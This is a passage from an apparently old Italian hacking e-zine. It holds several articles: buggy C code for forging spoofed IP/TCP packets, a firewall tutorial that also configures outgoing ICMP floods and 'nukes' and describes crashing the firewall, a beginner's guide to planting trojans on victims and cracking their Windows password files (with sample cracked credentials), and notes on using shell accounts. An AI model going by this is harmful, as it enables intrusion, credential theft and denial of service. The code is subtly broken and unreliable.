    case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
    case default: exit(1); break;
  }
  sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+
                IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv,
                sizeof(struct sockaddr));
  if((sp_status < 0) || 
       (sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen))
  {
    if(sp_status < 0)
      perror("sendto()\n"), exit(1);
    printf("Trasmessi soltanto %d bytes di %d\n", sp_stat, 
             sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen);
  }
}

Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i 
procedimenti di routine si tenta di risolvere l'host di destinazione, se non 
si riesce si esce (splendido gioco di parole...), se invece l'host esiste si 
copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li 
definite prima con #define (TCP 6 e UDP 17), se e' tcp l'header_base sara' 
ovviamente la lunghezza della dimensione minima dell'header tcp(20), se e' 
udp quella dell'udp (8) e se e' altro esce :), l'ip e' 20. Poi si manda il 
pacchetto spoofato realizzato prima, e si vede se il risultato e' positivo o 
meno, quanti bytes sono stati inviati, eccetera. La lunghezza naturalmente e'
la lunghezza dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip
(20) + la lunghezza delle opzioni ip. 500 righe! Uff! Che fatica... 
Dovremmo esserci... Per fixare i vostri header IP e TCP, ci sono due pratiche
(ALLA FACCIA!) funzioni:

void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo)
{
struct ipheader *sp_help_ip;
int HEADER_BASE;
switch(protocollo)
{
  case TCP: HEADER_BASE = TCP_HEADER_BASE; break;
  case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
  case default: exit(1); break;
}
sp_help_ip = (struct ipheader *)sp->buffer;
sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp->
                tcp_optlen);
sp_help_ip->tos = 0;
sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->
                tcp_optlen+sp->datalen);
sp_help_ip->ID = htons(12545);
sp_help_ip->flageoffset=0;
sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto...
sp_help_ip->protocol = protocollo;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer),
                                  IP_HEADER_BASE+sp->ip_optlen);
}

Questa e' per l'ip... e' molto intuitiva, e' inutile che ve la spieghi. 
Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la 
spiego brevemente: usate un HOSTENT, nel caso in cui l'host debba andare 
risolto. Se l'host e' gia' numerico, si verifica l'esistenza e si ritorna il 
valore long della medesima. Se invece non e' numerico, tentiamo di risolverlo 
e se ci riusciamo si puo' benissimo ritornare il valore long dell'host, 
altrimenti si da come risultato 0. Per fixare l'header TCP:

void sp_fix_TCP_packet(struct spdataexchange *sp)
{
char *pseudo_ip_construct[1500];
struct tcpheader *sp_help_tcp;
struct pseudoipheader *sp_help_pseudo_ip;
int i;
for(i=0;i<1500;i++)
  pseudo_ip_construct[i]=0;

sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen);
sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct;

sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) 
              | sp->flags);
sp_help_tcp->seq = sp->seq;
sp_help_tcp->ack = sp->ack;
sp_help_tcp->source = htons(sp->sourceport);
sp_help_tcp->destination = htons(sp->destinationport);
sp_help_tcp->window = htons(0x7c00);

sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source);
sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_pseudo_ip->zero_byte = 0;
sp_help_pseudo_ip->protocol = TCP;
sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp->
              tcp_optlen);

memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->
              optlen);
sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct,
                   sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen);
}


Ecco qua! Ultimo appunto: la in_cksum e' una funzione che potete trovare 
dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche 
sull'UDP (ma questa e' discriminazione razziale! :)), anche perche'' se 
conoscete bene il C (spero, altrimenti che avete fatto, avete letto fin qua 
senza capire un c***o???) e' molto intuitiva da realizzare... 

Se rimanete nel dubbio, pero', leggetevi i sorgenti di spoofit.h, una libreria
che mi ha ispirato non poco. Non ricordo il nome dell'autore, un attimo... 
Ah, si: Bretch Claerhout.

NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li 
         potete semplicemente aggiungere queste righe all'inizio del codice :)

#include <netinet/ip.h>   //contiene lo struct per lo header ip
#include <netinet/tcp.h>  //contiene quello per il tcp
#include <netinet/udp.h>  //e quello per l'udp

ma se ve l'avessi detto prima avreste potuto comprendere come e' formato un 
header ip???

I pacchetti IP (il protocollo che si occupa della consegna dei datagrammi) 
possiedono un campo che contiene l'indirizzo sorgente ed uno che contiente 
l'indirizzo di destinazione. Ai fini del routing solo il secondo dei due 
indirizzi ha importanza. E' per questo motivo che in condizioni normali 
(mancanza di ACL) e' possibile spedire dei pacchetti IP che "sembrano" 
provenire da un qualunque IP. In altre parole, in mancanza di un protocollo di
livello superiore che autentica la sorgente dei pacchetti IP, e' impossibile 
essere certi del fatto che l'indirizzo sorgente appartenga effettivamente 
all'host che li ha spediti. Immaginate un servizio di rete che utilizza il 
protocollo UDP per eseguire operazioni sul server su cui gira, ad esempio lo 
shutdown della macchina. Questo fantomatico ed insicuro protocollo (che e' 
assolutamente di mia fantasia, ma esempi simili si possono trovare in 
applicazioni reali) aspetta un pacchetto UDP contenente il comando "SHUTDOWN"
da un particolare indirizzo, ammettiamo 1.2.3.4: tutti i pacchetti provenienti
da altri indirizzi vengono scartati. Se non fosse possibile praticare l'IP 
spoofing solo l'host 1.2.3.4 sarebbe in grado di eseguire lo shutdown su quel 
server, di fatto invece chiunque puo' spedire un pacchetto come quello 
mostrato sotto.

                    ---------------------------
                    |    (INTESTAZIONE IP)    |
                    | ---------   ----------- |
                    | |1.2.3.4| - |IP SERVER| |                           
                    | ---------   ----------- |
                    |                         |
                    |...RESTANTE IP HEADER... |
                    |                         |
                    |        SHUTDOWN         |
                    ---------------------------

L'esempio, anche se di pura fantasia, mostra chiaramente che affidarsi ad una 
"trusted-relationship" che si basa sull'indirizzo IP, nel caso di protocolli 
non connessi, non e' affatto una buona idea. Quale sarebbe il modo corretto 
di disegnare il nostro shutdown-protocoll? Una delle possibilita' e' quella di
cambiare il protocollo in modo che il server, invece di eseguire direttamente 
il comando, aspetti un pacchetto UDP contenente la stringa "AUTH". Se il 
pacchetto non proviene da uno degli IP autorizzati non si cura la della 
richiesta, alrimenti spedisce un pacchetto che contiene un numero 
pseudo-casuale al client e si mette in attesa di un comando. Il client dovra' 
rispondere con un pacchetto formato dal numero casuale che ha ricevuto dal 
server seguito dal comando, ad esempio "2390-SHUTDOWN". Questo protocollo ci 
salva dall'IP spoofing (nel caso in cui l'attacker non e' posto fisicamente 
tra il server ed il client, altrimenti ha la possibilita' di leggere il numero
randomico e costruire il pacchetto con il comando), ma devono essere prese 
opportune precauzioni; il generatore dei numeri pseudocasuali deve essere 
"cryptographycally secure", ovvero possedendo una serie di output R1, R2, R3, 
RN, l'attacher non deve essere in grado di predire gli elementi successivi 
della sequenza (la funzione rand(3) della libc non e' un generatore sicuro, e'
un generatore lineare congruenziale facilmente predicibile). 

La seconda condizione e' che il numero pseudo casuale sia abbastanza grande da
non permettere all'attacher di montare un attacco di forza bruta in un tempo 
ragionevole. Come gia' detto, questo protocollo ipotizza che l'attacker, anche
se non in grado di spedire pacchetti provenienti dall'indirizzo (ad esempio) 
1.2.3.4, non sia in grado di intercettare le risposte che sono dirette 
all'host 1.2.3.4 (di solito su internet questo e' vero, sulle reti locali il 
discorso e' diverso). E' per questo che solo il client che possiede il giusto 
IP sara' in grado di vedere la risposta spedita dal server, contenete il 
numero pseudo-casuale.

Con tecniche di IP spoofing si riesce facilmente a falsificare l'indirizzo IP 
di una macchina?
In altre parole: Se faccio il traceroute dell'indirizzo finto, dovrei comunque
riuscire a risalire la catena dei router attraversati fino al finto, oppure 
risalgo la catena fino all'IP vero?
Si fa il traceroute VERO dell'indirizzo FINTO. In teoria, se i vari routers 
avessero un po' di ingegno, non si potrebbe fare neanche spoofing (o quasi).

In pratica puo' succedere questo:

A(F) ---> B ---> C ---> D
                /
F ---> E --->--+ 

A ti manda un pacchetto fingendosi F. B, che controlla la sottorete A, ed in 
teoria non dovrebbe veder passare pacchetti DA F verso "NON A", invece passa 
questo strano pacchetto "F verso D". Lo stesso fa C, che "dovrebbe" vedere 
arrivare i pacchetti di F solo da E (ma C non puo' sapere se F sia anche 
collegato o no a B). D si vede arrivare un pacchetto da un certo "F" che 
arriva da "C", di cui si fida e che in passato gli ha mandato pacchetti veri 
di F.
Un traceroute D-->F rivela: D, C, E, F ... B e A sono rimasti fuori.
E' possibile naturalmente sapere se F stia originando una connessione con 
D. A non puo' impedirlo. Pero', sapere che quel pacchetto "F->D" e' spoofato 
non ti fa trovare A.

Se volete maggiori informazioni su l'ip spoofing cercate in rete qualcosa del 
tipo tcpspoof.txt, oppure sequence_attacks.txt o shimomur.txt.

Nel prossimo numero parleremo di altri tipi di attacchi come l'IP ID attack.

davser@tin.it - http://davser.cjb.net - ICQ 19930061

---Davser---

----------------------------------------------------------------[ HacKinG ]---
===] CONSEAL FIREWALL TUTORIAL ]==============================================
========] Come condurre una vita rilassante in internet [=====================
-----[ WhITeFiRE ]------------------------------------------------------------

Ciao a tutti, questo il primo articolo che scrivo per Ais e ho pensato di
parlare del conseal firewall.
Firewall significa letteralmente muro di fuoco ed  un software per filtrare
le comunicazioni di un computer con la rete (internet) o tra una rete locale
e internet.

Il firewall pu agire su tutti i tipi di pacchetti e su tutti i  protocolli
(tcp\ip udp\ip ecc. ecc.).
Uno dei principali problemi di chi installa un firewall tipo il conseal  la
configurazione, infatti un firewall non configurato o configurato male non
conclude niente!

Ma adesso basta teoria andiamo alla pratica.

--[ BREVISSIMO DIZIONARIO

- Rules file o Ruleset file: file che contiene la configurazione del firewall,
  ha estensione .fwr
- Onerule o Rule subset: rule che si occupa di un determinato range o di una
  determinata porta, ha estensione .fws
- Allow: permettere
- Block: bloccare

--[ COMANDI PRINCIPALI DEL CONSEAL

Nel menu del conseal troviamo le voci:

FILE:
---- Change ruleset file => cambia il file dove sono contenute le rules
     (ruleset file)
---- Save ruleset as => salva la ruleset (salva con nome)
---- Import a rule subset => importa una onerule o rule subset

RULES: (contiene le impostazioni del ruleset file)

- CONTROL

-- Firewall state:

---- firewall up: attiva il firewall e comincia a filtrare i pacchetti (in
     base alle rules)
---- logging on: attiva il logging nella finestra principale del firewall

------------------------- Nota per i decerebrati -----------------------------

Logging e' l'atto di registrare qualcosa in appositi file detti log

--------------------- fine della Nota per i decerebrati ----------------------

---- Start in system tray: all' avvio di windows troverete l'icona del
     firewall vicio all' orologio nella barra di avvio (faccio pena eh?)

-- Ruleset scope

---- one for all network devices: una rules valida sia per le connessioni via
     modem che per una rete locale tipo ethernet
---- Separate ruleset for each device: il contrario

-- Ruleset usage (Lasciate su always che e' meglio!)

-- Password
Inutile dire che qu fissate la password senza la quale non potete accedere al
ruleset file, se non barrate la casella password non ne avrete bisogno.

-- Restore default ruleset: ndovina m'p (vi riporta il ruleset file a quello
   di default, sigh :-* tanto lavoro per nulla

- ALL NETWORK DEVICES

---- off: il firewall non aggiunge automaticamente alcuna rule' ce dovete
     pens voi
---- checked: il firewall vi chiede se permettere o bloccare i pacchetti e le
     connessioni nell' istante in cui vengono rilevate
---- unchecked: aggiunge automaticamente nuove rule nell' istante in cui
     vengono rilevate, per permette qualsiasi connessione

---- add: aggiunge una rule
---- edit: edita una rule
---- delete: cancella una rule

---- advanced: consente di bloccare o rendere liberi tutti i protocolli tranne
     tcp, udp, icmp, ip, arp e rarp.

--[ CONFIGURAZIONE DELLE RULES

Il firewall ci deve servire per:

1 Bloccare le porte di default dei trojan + comuni
2 Bloccare attachhi tipo Land o altri attacchi che vogliono far collegare il
  nostro pc a se stesso crashandolo
3 Bloccare gli ICMP Flood (tanto usati in IRC)
4 Bloccare i nuke (idem sopra) e permettere solo quelli in uscita che ci
  consentono di nukkare il lamer di turno
5 Bloccare il Netbios (se naturalmente non lo usiamo)
6 Permettere i ping  ma anche gli icmp flood (verso gli altri) e le risposte

...ed altro che vedremo in seguito

1) Bloccare le porte di defult dei trojan + comuni:
   1234, 31337, 27374, 12345, 12346, 20034 ecc ecc
   per ogni porta dobbiamo creare una rule in questo modo
   (come esempio prender subseven 27374)

Rules => All network devices => add

Nella prima schermata scrivete solo la descrizione della rule
(es. blocca subseven) e non toccate + niente quindi
=> NEXT o AVANTI

SERVICE: indica il tipo di servizio icq, pop, http, dns...
...ma siccome dobbiamo bloccare la porta di un semplice trojan non lo 
tocchiamo

=> Protocol (subseven adopera il tcp\ip quindi selezionare il tcp\ip)(per bo
   invece due rule diverse una su tcp e l' altra su udp)
=> Direction Inbound (entrata) e outbound (uscita), in questo caso tutti e due
=> Priority (priorit) minore  il numero maggiore  la priorit, per le
   normali rule va bene 100 (il firewall verifica prima quelle con priorit +
   alta e quindi con numero minore poi se tutto va bene passa a quelle con
   priorit minori)
=> on match --- qui  possibile scegliere se bloccare (block) o lasciare
   libere (allow) la porta o il range di porte. Potete anche bloccare i
   frammenti, usati in attacchi come bonk, boink, teardrop. Tenete presente
   che il protocollo tcp non frammenta mai, l'udp quasi mai e l'icmp
=> avanti => adesso scegliete l'indirizzo remoto in questo caso tutti
   (255.255.255.255 con mask 0.0.0.0) e la porta ( in questo caso 27374 to
   27374) dopo inserite l'indirizzo locale
   (127.0.0.1 con mask 255.255.255.255).
=> Selezionate solo always e poi

=====>>>> FINE

Ora vi chiederete ma che abbiamo fatto?? Si lo so  un po' frastagliato ma
dopo aver sbattuto un paio di volte la testa a muro sono sicuro che lo
capirete =)).

In pratica abbiamo creato una rule che blocca tutto ci che entra ed esce
(tramite il protocollo tcp\ip) da tutti gli indirizzi remoti (255.255.255.255
con mask ......) al nostro indirizzo (quello locale 127.0.0.1 con mask ......)
tutto questo vale sempre (always (ultima schermata) ).

Adesso voi creerete tante rules identiche per tutte le porte di default dei
trojan + comuni (attenzione ai protocolli il bo lavora sia su udp che tcp
quindi 2 rule).

Inutile dire che se usate un determinato trojan non dovete bloccare la sua
porta di default altrimenti non funziker. :)

Punto 2: Bloccare gli attacchi land.
Per fare ci non dovete fare altro che fare una rule che blocchi entrata e
uscita per tutte le porte dal vostro indirizzo
(127.0.0.1 con mask 255.255.255.255) verso il vostro indirizzo (127.0.0.1 con
mask 255.255.255.255) e alla fine sempre always; quindi per questa rule nella
casella remote (sia address che mask) e nella casella local (sia address che
mask) ci va il vostro indirizzo locale, non mi chiedete qual'  perch in
queste ultime 4 righe ve l'ho detto gi 2 volte. :)

Punto 3: Bloccare icmp icmp flood.
Stessa solfa dei trojan solo che dovete cambiare il protocollo da tcp\ip a
icmp\ip e le porte non saranno + da 0 a 65535 ma da 0 a 255, indirizzo remoto
il solito (255.255.255.255 con mask ......) e indirizzo locale il vostro
(127.0.0.1 mask ......) il tutto con priorit 200
=> always e poi => fine

ATTENZIONE SE VOLETE USARE L'ICMP FLOOD DOVETE BLOCCARE SOLO LE ENTRATE.

Punto 4: Bloccare i nuke.
Stessa cosa dei trojan ma qui in remote tutti gli indirizzi e tutte le porte
in locale invece il vostro indirizzo ma solo la porta 139 [139 to 139] (135
se avete win nt) ,protocollo tcp\ip, bloccare solo l' entrata se volete
nukkare qualcuno, poi sempre always e fine.

Punto 5: Bloccare il netbios.
La rule  la stessa di sopra perch il netbios usa la 139 ma se volete potete
bloccare anche le porte dalla 137 alla 138.

Punto 6: permettere i ping ma anche gli icmp flood
Per questo create una rule con priorit 90 che permetta (allow) per il
protocollo icmp\ip tutte le uscite (outbound) dal vostro indirizzo (che va
sempre nella casella local) a tutti quelli remoti (che vanno nella casella
remote).Questa rule permetter i ping e i flood, ma per ricevere le risposte
dei ping?

Semplice un' altra rule per il protocollo icmp\ip che permetta entrata e
uscita con priorit 100 da tutti gli indirizzi remoti e tutte le porte icmp
(0 to 255) al vostro computer SOLO PER LA PORTA 8 la ping-reply, quindi nel
riquadro local dove dice types scriverete 8 to 8
=> avanti => solo always e poi => fine

Punto 7 Azz non esiste nessun punto 7 :) hihihihi

------------------------------------------------------------------------------
--------[ ADVANCED ]----------------------------------------------------------
------------------------------------------------------------------------------

Se non avete capito la prima parte non continuate.
Ecco alcune evolutions che si possono fare con il conseal:

1 lasciare libera la porta del netbus se netbuster  attivo in memoria e
  bloccarla se netbuster non  attivo

Il netbuster si mette in ascolto sulla porta 12345 quindi nella nostre rule
invece che bloccare la 12345 la lasceremo libera [allow] e nell'ultima
finestra (dove finora avete messo solo always) alla voce "When runnig"
scriverete il pecorso del netbuster (c:\netbuster\netbuster.exe) capito??? e
poi fine (always si deselezioner automaticamente).Dopo create una rule con
priorit 200 che blokker la porta 12345.

Il Firewall proceder cos:

1) controlla la rule del netbuster (priorit maggiore) e se non apre la porta
   (quindi non trova netbuster attivo) passa a quella con priorit minore e
   blocca la 12345

2) TROVARE GLI IP CON CONSEAL PC FIREWALL

eh si avete letto bene siete in irc e non siete op, potete trovare l'ip di
qualcuno, basta che questo abbia uno script che controlli le porte comuni di
tutti i trojan, che vi faccia un ping flood o un nuke (che voi blokkerete)
infatti il firewall vi dir in una piccola schermata:
remote machine ip.del.lam.er wants to connect to you on port 12345
(o qualsiasi altra porta di un trojan, porta icmp o 139, ecc ecc) e voi
naturalmente clikkkerete su block e lui non entrer. Visto avete l'ip.

Per il firewall vi chieder questo per ogni connessione e quindi per i ping,
per visitare siti web ecc ecc e con tutto quello che farete nella rete.
Quindi riceverete molto spesso queste schermate e perci vi consiglio se non
siete molto esperti di crearvi la vostra rule e settare il firewall a off.

Ma non  finita Leggete il punto 3 (gngngngn)

3) Crashare il conseal

E' possibile anche crashare un firewall settato in modalit checked o in
logging on, infatti se una persona apre tante connessioni ogni volta con ip e
porta diversi con l'host che ha il conseal (settato in modalit checked o con
il loggig on abilitato) questo crasher perch non riuscir + a controllare
tutte le connessioni e le rules che andr aggiungendo ad ogni richiesta di
connessione.
Lo script che fa ci (linux Source) lo trovate tra i file di ais3 (ccrash.zip)

Spero che l'articolo vi sia piaciuto e vi sia sembrato utile, per qualsiasi
problema potete trovarmi in irc.tin.it sul canale #aisprod o mailarmi
all'indirizzo fausu@libero.it, se riscontrate errori (concettuali non
grammaticali) nel testo mailatemi per correggerli.

:saluti

Saluti mega: a Oldiron e tutta la ais crew che ci permettono di scrivere
             e soprattutto leggere questa fantastica rivista.

Saluti normal: al mio amico cicciomix, quando la smetterai di usare quello
               stupido trojan e comincierai a darti alle cose + serie?

Saluti Fuck: alla mia prof di matematica  (gngngngngn)

ByeZ a tutti 

---WhITeFiRE---

---------------------------------------------------------------[ HacKinG? ]---
===] TROJAN?? SI, GRAZIE! -4 REALLY NEWBIES- ]================================
-----[ Dmaster ]--------------------------------------------------------------

 
-->CONSUMO<--
1 lattina di 7up
2 panini
1 ragazza nuda (molto utile nei momenti di noia...hihihi)

-->SALUTI<--
Ninj@net(Pirl@net x gli amici) - VanadiuM(met uomo, met SoftICE) - Light -
Kham - Dibdo

-->DISCLAIMER<--
Tutte le informazioni riportate in questo articolo sono ritenute a scopo
puramente informativo,
n io, n nessun altro sulla faccia della terra (oltre si) sono responsabili
di danni causati dall'uso delle nozioni sotto riportate.

-->COMINCIAMO<--
Ciao a tutti!
Molti newbies che come me si stanno avvicinando al mondo dell'hacking hanno
sentito parlare di trojan, ma cosa sono in realt questi piccoli software o
come alcuni li definiscono piccoli cavalli di Troia??? I trojan non sono altro
che piccoli programmini che una volta installati sul PC di qualcuno possono
darti il controllo assoluto di questo PC con una semplice connessione a
internet.

Un trojan  formato da due parti: il CLIENT e il SERVER.
Il SERVER  il software che va installato sul PC della vittima, mentre il
CLIENT  il programma che vi permetter di connettervi al computer da voi
infettato conoscendo semplicemente l'IP della vittima.

-->TROVARE IP DI QUALCUNO<--
Trovare IP di qualcuno pu risultare + easy(facile x gli ignoranti) di quanto
pu sembrare.
Le tecniche pi diffuse x conoscere questo codice magico sono varie, se la
vostra vittima  su ICQ basta vedere sulle informazioni dell'utente, mentre
se si trova su IRC basta digitare:

/dns <nick della vittima>

Spesso IP ottenuto con le tecniche sopra riportate non  completo, x rimediare
a questo problema molti trojan sono dotati di scanner che vi permettono di
trovare le cifre mancanti dell'IP che state cercando. Comunque x gli sfaticati
che vogliono ottenere tutto in maniera + semplice c' da dire che molti nuovi
trojan hanno un'opzione che permette di mandare, quando la vittima si connette
a internet, un e-mail con il suo codice IP!!! Se si usa questa opzione io
consiglio di farsi mandare l'e-mail in una casella elettronica poco usata,
xch i trojan memorizzano il vostro indirizzo e-mail in un file *.log o nel
file del server stesso, in questo modo se la vittima  esperta e scopre il
trojan nascosto nel suo PC, con un comune decompilatore potrebbe conoscere il
vostro indirizzo e-mail portando a conseguenze poco piacevoli (lascio a voi
immaginare).
                                                             
-->USI E RIUSI DEI TROJAN<--
Esistono una marea di trojan, e ogni giorno ne compare uno nuovo, ma i +
famosi sono:

Back Orifice, NetBus, Donald Dick, SubSeven, DeepThroat, Girl Friend,
TCommando...

Ora che sapete come  composto un trojan, vi chiederete, ma come funziona un
trojan? (se non ve lo chiedete  meglio che leggiate altro, PlayBoy ad 
esempio, hihihi) Quando avrete installato il server sul computer della vostra 
vittima esso aprir una porta sul computer remoto che aspetter una 
connessione da parte del client.

La maggior parte dei trojan modificano il registro di Windows o il file
win.ini in modo da poterli far partire ad ogni accensione del PC. Io
consiglio ogni tanto di dare un'occhiata al vostro registro di sistema e al
file win.ini x evitare spiacevoli sorprese. Un'altra tecnica (se cosi si pu
definire) x sapere se si hanno delle porte aperte  andare in prompt MS-DOS e
digitate 'netstat -a' (senza ').

Le opportunit che vi offre un trojan sono tante: scaricare file, modificare
il registro di Win, scoprire numeri di carte di credito. 

Usare queste opzioni  facile e intuitivo, quindi passo a spiegarvi qualcosa
di meno intuitivo ma di molto utile, scoprire le password di Windows (anche
quelle degli account ad internet ;-)).

Per trovare queste password, una volta scelto il trojan da usare  averlo
settato ed installato con una scusa sul computer della vostra vittima,
connettetevi alla porta aperta dal vostro alleato e scaricate dal PC infettato
il file file SYSTEM.INI, apritelo con un editor di testo (Blocco note va
benissimo), e cercate la voce [PASSWORD LIST], una volta trovata questa voce
vi troverete davanti qualcosa del genere:

[PASSWORD LIST]
MATTIALAUS = C:\WINDOWS\MATTIALAUS.PWL

A questo punto scaricatevi il file .PWL indicato e crakkatelo con un software
di CRAKING PASSWORD WINDOWS (Consiglio: PWL's Hackers) e dovreste ottenere
qualcosa del genere:

      (C) 21-Nov-2000 by AutoreSoftware "PWL's Hacker" v4.64 (1997,98,99)
                                
                Enter the .PWL owned User Name:  MATTIALAUS
                Enter the User Password:
         File 'MATTIALAUS.PWL' has size 796 bytes, version [W95osr2_Win98]
                 for user 'MATTIALAUS' with password '' contains:

          -[Type]-[The resource location string]--------------[Password]-
          Dial   *Rna\libero\mattia                              matto84
          Dial   *Rna\infinito\laus                              dj84
          ---------------------------------------------------------------
          * Indexed Entryes: 1;   Number of resources: 2.

Ed ecco a voi le password da poter sfruttare. Ora capite xch dico che i
trojan non sono software solo x lamer? Ultimo consiglio che vi do, xch sono
le 04:00 a.m. e domani ricomincia (purtroppo) la scuola :-(,  quando
impostate il server da dare alla vostra vittima non lasciate mai la porta
di connessione standard del trojan xch si potrebbe risalire subito alla sua
presenza e al suo tipo.

Queste sotto riportate sono alcune delle porte standard dei trojan + diffusi:

 |------------------------|-----|
 |TROJAN                  |PORTA| 
 |------------------------|-----| 
 |NetBus 1.x              |12345|
 |NetBus Pro              |20034|
 |BackOrifice             |31337|
 |WinCrash                |4092 |
 |IcqTrojan               |4950 |  
 |Ripper                  |2023 |
 |Quebus 1.0b             |65842|
 |Blade Runner 2.x        |5402 |
 |------------------------|-----|
       
Comunque potete trovare una lista completa sulle porte standard dei trojan al
sito:

http://valvoline.cjb.net/

Ciao...e alla prossima!!!

P.S.
Essendo uno dei miei primi articoli da quando ho iniziato a voler diventare
(si spera) hacker, sono ben accettate critiche, suggerimenti...il mio
indirizzo e-mail : dmaster@infinito.it

Potete anche trovarmi su IRC sul canale #cisco (IRC Server: chat.parsec.it).
Ciauz!!!

P.P.S.S.
Non usate mai i trojan x arrecare danni alla gente (eccetto chi vi sta sugli
zebedei) altrimenti sarete solo sporchi lammeroni!!

<<Provoces the best you will die like a slave>>

---Dmaster---

----------------------------------------------------------------[ HacKinG ]---
===] SFRUTTARE UNA SHELL 4 NEWBIES ]==========================================
-----[ Falcon ]---------------------------------------------------------------

Bene, mi presento.
Mi chiamo Falcon sono nuovo nella E-zine, mi  stata data l'opportunit da
Oldiron di scrivere in Anarchy in The System e devo dire quando glielo ho
chiesto sono stato felice di avere avuto da lui una risposta positiva. 

Ho 2x anni, navigo in irc e in generale su internet da 13 anni circa, sono
passato subito ai cosiddetti sotterranei di internet perch li trovavo molto
pi interessanti rispetto al classico http://www.cazzate.com.

Qui ho potuto conoscere molte persone, dapprima ero su dalnet dove ho avuto
la possibilit di entrare in Warezpower e l persone come  Guardian,
Infiltrat mi hanno aiutato molto a crescere diciamo in campo internettiano
.
Poi sono passato a undernet nel mitico canale warezitalia l ho conosciuto
ramlin che mi fece la proposta di creare un gruppo, poi purtroppo non se ne
fece niente per vari motivi.
Bhe credo che vi siete proprio rotti di saperne di me, ok  meglio passare al
mio primo articolo, anche se credo che gi molti di voi sappiano come
utilizzare una shell quindi non mi riempite di email piene di insulti.
GRAZIE.

La Shell  un accesso via telnet ad un sistema based-UNIX o meglio Linux che
dispone di linee ad alta velocit (non sempre purtroppo) e se siete fortunati
una grande capienza dati.
Grazie alla SHELL potete utilizzare qualsiasi comando compatibile con il
sistema operativo della macchina remota che vi offre il servizio, divertente
non credete?;)
Molte volte le shell che si trovano nella rete non sono molto stabili,
presentato dei quote bassi e le linee soprattutto quelle italiane (qui
ringrazio in particolar modo mamma TELEKOM) presentano una lentezza
esasperante.

Quindi la cosa principale da fare  trovare delle shell stabili almeno 4 mesi
e no quote cio senza limitazioni di spazio.

Ora per quanto concerne il collegamento ne esistono vari tipi, di seguito vi
elenco i principali:

64k               velocit al quanto bassa
128K              velocit al quanto bassa
ISDN              velocit al quanto bassa non pi di 5k se vi va bene
256k              velocit normali
512k              velocit normali
T1                velocit elevata circa 2MB/sec
T3                velocit elevatissima pari a 43MB/sec dette anche stellari
                  (ah se ne trovate una siate gentili il mio indizzo e-mail 
                   alla fine del doc, grazie.:)
                                             
Una volta ottenuta la shell dovete per prima cosa verificare la tipologia;
controllare che il login e la password facciano il loro dovere e dopo cambiare
immediatamente la password cos evitate che altri si possono impadronire
della vostra shell.

Per cambiare la password dove utilizzare il comando "passwd" ed eseguire tutto
quello che vi appare a video; poi verificate se la shell  noquote o quote.

Per fare ci digitate quote, se non vi appare nulla BINGO vuol dire che avete
a disposizione tutto lo spazio altrimenti vi replicher con dei numeri.

Per verificare invece la velocit della connessione della shell qui la
questione non  semplice nel senso che dovete essere voi a testarla con
trasferimenti ftp in modo da constatare se il flusso dei dati  costante
oppure o no.

In linea di massimo una linea T1 riesce al massimo a raggiungere velocit
pari a 40Kb/sec di trasferimento mentre una T3 pu raggiungere anche punte di
100Kb/sec

Una volta dentro potete utilizzare alcuni programmini interessanti che spero
conosciate bene :), su scherzavo dai.

I tre programmi principali che si possono utilizzare in un SHEEL ACCOUNT sono:

FTP - Telnet - Irc.

Iniziamo dall'FTP.
Supponiamo che vi dovete collegare al sito tuttiiprogrammidelmondo.com e
prelevare tutta directory /Gamez, come fare...

1. entrate nella shell;
2. createvi una directory con il comando mkdir;
3. eseguite l'fpt con il seguente comando ftp -i tuttiiprogrammidelmondo.com;
4. immettere la login e la password entrando nell'FTP;
5. settate subito il trasferimento binario con il comando binary;
6. entrate nella directory /Gamez;
7. eseguite il comando per prelevare tutti i files: mget *.*

Una volta eseguiti questi comandi digitale logout in modo da evitare che la
connessione venga tranciata. A questo punto potete pure scollegarvi e
ricollegarvi l'indomani nella vostra shell con tutta la dir /Gamez piena dei
vostri giochini.:)

Per quanto riguarda telnet non c' niente da dire .. potete utilizzare tutti
i comandi unix o linux che volete:)) quindi a voi la scelta di smanettare con
i comandi giusti.

Per irc invece permette di fare molte cose come installare un semplice bot
che vi tenga un canale. Ma questo se mi sar permesso di scrivere ancora vi
spiegher come istallare un bot.

Spero di essere stato chiario e semplice nella spiegazione comunque se volete
contattarmi la mia email  falcon@thenavy.com oppure potete trovarmi su
irc.tin.it nel canale #phreak.it

---Falcon---

----------------------------------------------------------------[ HacKinG ]---
===] SICUREZZA PER BAMBINI ]==================================================
-----[ Sash4 ]----------------------------------------------------------------

allora....
pensiamo un po... 
sicurezza, vi dice niente il nome???
Questo articolo(articolo poi... manco scrivessi per il times :) sembrer a 
molti l'uovo di Colombo (chi il tenente?.... vabbe gaia...lascia perdere...), 
molti anzi tutti, dopo aver letto questa minchiata crederanno di aver perso 
tempo prezioso che potevano dedicare ad altro(droga, figa,nutella,europei,
